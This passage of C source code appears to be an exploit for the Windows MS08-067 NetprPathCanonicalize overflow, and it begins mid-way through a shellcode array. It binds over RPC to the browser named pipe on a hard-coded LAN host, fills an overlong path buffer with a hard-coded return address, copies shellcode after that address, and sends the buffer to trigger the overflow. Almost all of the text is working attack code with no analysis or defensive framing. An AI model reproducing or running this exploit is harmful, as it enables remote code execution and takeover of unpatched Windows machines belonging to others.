"\x53\xFF\x57\xFC\x53\xFF\x57\xF8"; int main(int argc, char **argv) { RPC_STATUS status; unsigned char * pszStringBinding = NULL; status = RpcStringBindingComposeA(NULL, (RPC_CSTR)"ncacn_np", (RPC_CSTR)"192.168.42.128", // net addr (RPC_CSTR)"\\pipe\\browser", // endpoint NULL, &pszStringBinding); printf_s("RpcStringBindingCompose returned 0x%x\n", status); printf_s("pszStringBinding = %s\n", pszStringBinding); if (status) { return status; } status = RpcBindingFromStringBindingA(pszStringBinding, &mIDA_interface_v3_0_c_ifspec); printf_s("RpcBindingFromStringBinding returned 0x%x\n", status); if (status) 
{ return status; } RpcTryExcept { unsigned char buff[1024]; //WCHAR szBuffer[] = L".\\\\x\\..\\..\\ABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKL"; //WCHAR szBuffer[] = L".\\\\x\\..\\..\\ABCDEFGHIJKABCDEFGHIJKABCDEFGHIJKABCDEFGHIJKABCDEFGHIJKABCDEFGHIJKABCDEFGHIJKABCDEFGHIJKABCDEFGHIJKABCDEFGHIJKABCDEFGHIJKABCDEFGHIJKABCDEFGHIJKABCDEFGHIJKABCDEFGHIJKABCDEFGHIJKABCDEFGHIJKABCDEFGHIJKABCDEFGHIJKABCDEFGHIJKABCDEFGHIJKABCDEFGHIJKABCDEFGHIJKABCDEFGHIJKABCDEFGHIJKABCDEFGHIJKABCDEFGHIJKABCDEFGHIJKABCDEFGHIJKABCDEFGHIJKABCDEFGHIJKABCDEFGHIJKABCDEFGHIJKABCDEFGHIJKABCDEFGHIJKABCDEFGHIJKABCDEFGHIJKABCDEFGHIJKABCDEFGHIJKABCDEFGHIJKABCDEFGHIJKABCDEFGHIJKABCDEFGHIJKABCDEFGHIJKABCDEFGHIJKABCDEFGHIJK"; WCHAR szBuffer[] = L".\\\\x\\..\\..\\xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx00xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx"; // EIP Address int * callback_address = (int *)(szBuffer + 90); *callback_address = (int)0x5FE1BF83; strcpy((char *)callback_address + 4, (char *)ShellCode); long type = 1; _NetprNameCompare(mIDA_interface_v3_0_c_ifspec, L"MS08067", (wchar_t *)"\x53\x00\x56\x89\x56\x89\x56\x89\x56\x89", (wchar_t 
*)"\x4D\x00\x56\x89\x56\x89", 4, 0); _NetprPathCanonicalize(mIDA_interface_v3_0_c_ifspec, L"MS08067", szBuffer, buff, sizeof(buff), L"", &type, 0); } RpcExcept(EXCEPTION_EXECUTE_HANDLER) { unsigned long ulCode = RpcExceptionCode(); printf_s("Runtime reported exception 0x%lx = %ld\n", ulCode, ulCode); } RpcEndExcept } /*********************************************************************/ /* MIDL allocate and free */ /*********************************************************************/ void __RPC_FAR * __RPC_USER midl_user_allocate(size_t len) { return(malloc(len)); } void __RPC_USER midl_user_free(void __RPC_FAR * ptr) { free(ptr); }